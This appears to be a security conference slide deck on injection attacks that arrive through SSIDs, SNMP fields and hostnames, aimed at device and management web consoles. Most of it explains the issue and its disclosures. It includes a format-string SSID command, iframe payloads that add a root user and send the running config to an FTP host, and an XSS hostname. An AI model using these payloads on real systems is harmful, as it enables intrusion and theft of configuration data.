With nearly every embedded device and enterprise management solution serving up a web console for management, we are faced with the question (does that web service properly filter incoming data?). Unfortunately, the answer to that question is No. My research has shown that simple name data is often overlooked. This includes, SSIDs, SNMP sysDesc and Hostnames, just to name a few, which are consumed by the applications and embedded devices without proper filtering. Over the last 4 years I have researched this issue, and discovered that nearly 50% of products tested were vulnerable to injection attacks via this vector. During this presentation I will be discussing these various injection vectors, and the attacks that I have successfully developed against targeted systems using these exploits.

1. It’s All In The Name

2. Introduction
Deral Heiland
Rapid7 Research Lead “IoT”
• 25+ years of experience in the Information Technology,
15 of that in Security and last 8+ year security
researcher, penetration tester and consulting for
corporations and government agencies
deral_heiland@rapid7.com
@Percent_X

3. Agenda
• Why
• Web technology
• Web security and lack there of
• Injection attack using commonly overlooked methods
• A few examples
• Conclusion
• Questions

4. Why
• Search for simple and obvious attacks vectors
• Machine to machine exchange of data
• The simple is so often overlooked

5. Web Technology
• Embedded
• Appliance
• IoT
• Management software
• Network
• Security
• Device (printers)

6. Acme.Serve/v1.7 of 13nov96
ACS 5.5
Allegro-Software-RomPager/1.52
Allegro-Software-RomPager/ 2.10
Allegro-Software-RomPager/4.10
Allegro-Software-RomPager/4.34
Apache
Apache/2.2.15 (CentOS)
Apache/2.2.15 (Red Hat)
Apache/2.2.17 (Unix)
Apache/2.2.29 (Unix)
Apache/2.2.31 (FreeBSD)A
Apache/2.2.3 (CentOS)
Apache/2.4.12 (Unix)
Apache-Coyote/1.1
AvigilonOnvifNvt/2.2.0.14
AvigilonOnvifNvt/2.6.0.4
Avocent DSView 3/3.7.1.27
Brivo ACS OnSite
Cherokee/1.2.101 (UNIX)
Cougar/9.6.7100.0
DVRDVS-Webs
EWS-NIC4/11.68
GoAhead-Webs
gSOAP/2.8
Happy ICS Server
Hiawatha v5.7
HP-ChaiServer/3.0
HP-ChaiSOE/1.0
HP_Compact_Server
HTTP/1.0
HTTP/1.1
IBM_HTTP_Server
IBM_HTTP_SERVER/1.3.28 Apache/1.3.28
(Win32)
Jetty/5.1.10 (Linux/2.6.11gum arm java/1.3.1
subset
Jetty/5.1.10 (Linux/2.6.21gum arm java/1.4.2
subset
Jetty(6.1.5)
Jetty(8.y.z-SNAPSHOT)
Jetty(9.1.1.v20140108)
Jetty(9.1.5.v20140505)
Jetty(9.2.z-SNAPSHOT)
lighttpd/1.4.11
lighttpd/1.4.13
lighttpd/1.4.23-devel-2760
lighttpd/1.4.23-devel-3200
lighttpd/1.4.25-devel-7739
lighttpd/1.4.32
lighttpd/1.4.35
Linux/3.0.1+, UPnP/1.0
Mbedthis-Appweb/2.4.2
Microplex emHTTPD/1.0
Microsoft-HTTPAPI/2.0
Microsoft-IIS/10.0
Microsoft-IIS/6.0
Microsoft-IIS/7.0
Microsoft-IIS/7.5
Microsoft-IIS/8.0
Microsoft-IIS/8.5
Microsoft-WinCE/7.00
Mono.WebServer2/0.4.0.0 Win32NT
nginx/1.2.3
nginx/1.4.6 (Ubuntu)
Niagara Web Server/3.5.34
Niagara Web Server/3.7.106.12
PanWeb Server/ -
PasteWSGIServer/0.5 Python/2.6.6
RapidLogic/1.1
SecureTransport 5.3.1
thttpd/2.25b
ulwsd/1.0.1-20140331
Virata-EmWeb/R6_0_1
Virata-EmWeb/R6_2_1
Wireless IP Telephone HTTPd
Web Technology

7. • XSS allows Malicious actors to inject client-side
scripts into web pages viewed by other users.
• Reflective
• Persistent
• CSRF causes a user's web browser to perform
an unwanted action.
• Alter configurations
• Complete a transaction (IE Banking)
Web security and The lack there of !

8. • Format String A format string is an ansi C
specifier that is supplied to a function to tell the
program what the format of the output should
be.
• Format String Vulnerability Incorrectly written
code that does not define the format string
specifiers. Allowing format strings to be passed
within an applications variable, which leads to
the application evaluating the input as code.
Web security and The lack there of !

9. • Filtering input
• Escaping dangerous characters
• Use CSRF tokens
• Conduct regular code reviews
Web security and The lack there of !

10. • Directly targeting web app
• Internet exposed app still often discovered with issues
• Good AppSec program can help mitigate
• Application firewalls can help mitigate Internet exposure
• Off the shelf products and embedded devices still have issues
Web security and The lack there of !

11. Exploit Delivery

12. Exploit Delivery
• Machine to Machine
• Very often overlooked
• Great for targeting enterprise
• Enterprise management solutions
• Embedded devices

13. SSID

14. SSID
• Service Set Identifier (SSID)
• Purpose of the SSID is to assign human readable names
to an 802.11 wireless network
• The SSID is broadcast in a management frame or Beacon
Frame

15. SSID information element
• Element ID: This is set to ‘0’ to signal that an SSID is being broadcast
• Length: Indicates the length of the information field
• SSID: The human readable station name

16. SSID
• No defined restrictions as to what characters can be
used within an SSID (IEEE Std 802.11™-2012)
• Limited to 32 characters

17. SSID
• Not the first time this attack vector was reported
• Rafael Dominguez Vega of MWR InfoSecurity
• White paper: Behind Enemy Lines July 2008
• BT Home Hub
• DD-WRT
• My research expanded on this and targeted more
enterprise level solutions

18. SSID
• This research work initial disclosed in 2013 Blackhat
Europe
• Multiple vulnerable products
• Wifi Pineapple
• Cisco small business Wifi Wap200 and Wep200
• SonicWall network security appliance
• Aruba Wireless LAN Controllers
• Since then
• Unnamed Wifi Lan Controller
• Enterprise IoT automation solution ( Not Released Yet)

19. SSID
• Attack vectors identified deliverable via SSID
• XSS
• CSRF
• Format string

20. SSID
• Format String Injection
• Cisco/Linksys WAP200 & WET200
• Site Survey function: Listens for all APs within range and reports
back their SSID

21. SSID
• Setup airbase-ng to broadcast SSID “%x%x%x”
airbase-ng -e “%x%x%x" -c 2 mon0
• AP survey detected %x%x%x SSID

22. SSID
• SonicWall Tz210
• Aruba WLC

23. SSID
• Aruba commands executed using <IFRAME>
<iframe src=/screens/auth/execAddUser.html?
username=hacker&passwd=Hack3d&role=root&status=>
<iframe src=/screens/cmnutil/execCommandReturnResult.xml?copy
%20running-config%20ftp%20192.168.1.14%20%22anonymous
%22%20%22test%22%20%22running.cfg%22%20%22/incoming
%22@@1357225152747>

24. SNMP
ISO (1)
ORG (3)
DOD (6)
INTERNET (1)
Directory (1) Management (2) Experimental (3) Private (4)

25. SNMP
• Management Information Base (MIB) is a file
that contains definitions of management
information so that networked systems can be
remotely monitored, configured, and controlled.
• Object Identifier (OIDs) point to individual
network objects that are maintained within a
database called a Management Information
Base

26. SNMP
• The OIDs that are the most critical include:
• 1.3.6.1.2.1.1.1.0 sysDesc
• 1.3.6.1.2.1.1.4.0 sysContact
• 1.3.6.1.2.1.1.5.0 sysName
• 1.3.6.1.2.1.1.6.0 sysLocation

27. SNMP
• Injection attacks via SNMP data
• Research project started in Fall 2015
• Deral Heiland Matthew Kienow
• Mainly targeting Network Management Systems
• Currently 6 published products advisories
• 5 more to be released prior to Defcon Conference

28. SNMP
• Demo Nexpose
• Demo SNMPc

29. Hostname
scriptalert('YOUR-PWND')/script

30. Hostname
• What application and appliances consume hostname?
• What is the impact?
• Do they properly filter and escape data from hostname?

31. • CVE-2015-3626, (XSS) vulnerability in the DHCP Monitor page in the
Web User Interface (WebUI) in Fortinet FortiOS before 5.2.4 on FortiGate
devices allows remote attackers to inject arbitrary web script or HTML via
a crafted hostname
• CVE-2014-4645
• CVE-2014-4727
• CVE-2013-3572
Hostname

32. Hostname
• I am still collecting data on this
• Made a request several months back online
• https://community.rapid7.com/community/infosec/blog/
2016/03/09/it-s-all-in-the-name
• Check out blog and participate
security@rapid7.com (PGP KeyID: 0x8AD4DB8D)

33. Questions
Deral Heiland
Rapid7 Research Lead “IoT”
Deral_Heiland@rapid7.com
@Percent_x